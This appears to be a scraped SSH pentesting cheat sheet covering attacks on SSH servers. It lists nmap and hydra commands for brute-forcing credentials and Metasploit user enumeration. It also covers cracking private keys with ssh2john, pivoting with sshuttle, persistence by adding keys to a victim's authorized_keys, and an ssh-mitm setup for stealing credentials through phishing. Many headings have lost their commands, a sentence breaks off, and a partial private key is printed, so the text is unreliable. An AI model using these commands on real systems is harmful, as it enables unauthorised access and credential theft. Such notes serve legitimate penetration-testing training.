SSH (Secure Shell) Pentesting
SSH is a cryptographic network protocol for operating network services securely over an unsecured network. A
- [linux-restricted-shell](
nmap --script ssh-brute -p 22 <target-ip>
nmap --script ssh-auth-methods --script-args="ssh.user=username" -p 22 <target-ip>
nmap --script ssh-* -p 22 <target-ip>
# User enumeration
msf> use auxiliary/scanner/ssh/ssh_enumusers
Brute Force Credentials
# -t: tasks
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4
# Specific ports
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4
If the target host opens port 80 or 443, you can generate wordlist from the contents of the website then use Hydra.
Crack SSH Private Key
First of all, you need to format the private key to make John to recognize it.
ssh2john private_key.txt > hash.txt
# or
python2 /usr/share/john/ private_key.txt > hash.txt
Crack the password of the private key using the formatted text.
Banner Grabbing
Also, ssh-audit is an useful tool for SSH server and client auditing.
Configuration Files
If you know a target credential, you can connect a remote server over SSH using the credential.
ssh username@<target-ip>
ssh username@<target-ip> -p 22
# Using private key
ssh -i id_rsa username@<target-ip>
# Without username
Additional Options
If we got the error message "no matching host key type found. Their offer: ssh-rsa...", add the following flag.
If we got error "no matching key exchange method found. Their offer: diffie-hellman-...", add the "KexAlgorithms" flag as below.
Execute Commands after Connecting
Test Connection
Connect to Windows via Active Directory
Connect using an Existing Private Key
Copy the Content of id_rsa (Private Key)
In remote machine,
Create New Private Key in Local Machine
Don't forget to change permission this file. Otherwise, you cannot connect remote server.
Connect using Private Key
If the error “error in libcrypto” occured, edit the format of the RSA private key.
The correct format is below:-----BEGIN RSA PRIVATE KEY----- Proc-Type:4,ENCRYPTED DEK-Info:AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU ... ... ... 7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD -----END RSA PRIVATE KEY-----
Transfer Files
Send a File/Directory to Another Machine
# Send a file
scp ./example.txt user@<ip>:./example.txt
# Send a directory
scp -r ./example user@<ip>:/home/<ip>/
Download a File/Directory from Another Machine
# Download a file
scp user@<ip>:/home/<user>/path/to/file.txt .
# Download a directory
scp -r user@<ip>:/home/<user>/path/to/file.txt .
If you get error “connection refused”, the SSH server is not running in another machine. So you need to start the SSH server.
Create SSH Keys
Generate Keys
Install SSH Key
In target machine,
Generate SSH Keys and Set Up Public Key to Connect Remote Machine
1. Check if authorized_keys Exists in Remote Machine
If it exists, you may be able to connect SSH with your keys as victim user.
2. Generate SSH Keys in Local Machine
Then copy the content of public key you generated.
3. Add the Content of Publick Key to authorized_keys
In remote machine,
SSH Server
Check for any Established Connection
To get the “pts/# terminal”, run the following command. The pts stands for pseudo terminal slave.
To kill any connections, run the following commands.
SSH Proxy Server
sshuttle is transparent proxy server that works as a poor man's VPN. Forwards over ssh.
sshuttle -r username@<remote-ip> <remote-ip>/24
# Automatically determine subnet
sshuttle -r username@<remote-ip> -N
# Using private key
sshuttle -r username@<remote-ip> --ssh-cmd "ssh -i private_key" <remote-ip>/24
# Exclude the specific ip (-x)
sshuttle -r username@<remote-ip> <remote-ip>/24 -x <remote-ip>
Then you can access to other networks.
If you get the error "Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found...", you need to flush DNS cache.
Run sshuttle again.
SSH-MITM for Stealing Credentials
If the target system user try to connect arbitrary host using SSH, we might be able to steal credentials by listening via the SSH man-in-the-middle server.
Run the following command in local machine.
# If not have the ssh-mitm, install first.
pip3 install ssh-mitm --upgrade
# --enable-trivial-auth: The "trivial authentication" phishing attack
# --remote-host: Specify the target ip/domain
# --listen-port: Specify the ip address to listen in local machine
ssh-mitm server --enable-trivial-auth --remote-host --listen-port 2222